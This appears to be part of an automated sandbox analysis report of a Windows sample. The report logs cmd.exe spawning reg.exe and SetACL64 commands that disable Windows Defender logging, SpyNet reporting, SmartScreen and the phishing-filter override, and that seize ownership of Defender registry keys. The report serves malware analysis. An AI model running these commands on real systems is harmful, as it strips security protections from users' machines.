Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, | 4_2_00007FF697086C40 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 4_2_00007FF69708791C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 4_2_00007FF697087674 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW, | 4_2_00007FF697087548 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 4_2_00007FF697087498 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW, | 4_2_00007FF697087340 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 4_2_00007FF69708705C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 4_2_00007FF6970870F4 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 4_2_00007FF697086F8C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: try_get_function,GetLocaleInfoW, | 4_2_00007FF697087EB0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, | 5_2_00007FF697086C40 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 5_2_00007FF69708791C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 5_2_00007FF697087674 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW, | 5_2_00007FF697087548 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 5_2_00007FF697087498 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW, | 5_2_00007FF697087340 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 5_2_00007FF69708705C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 5_2_00007FF6970870F4 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: EnumSystemLocalesW, | 5_2_00007FF697086F8C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: try_get_function,GetLocaleInfoW, | 5_2_00007FF697087EB0 |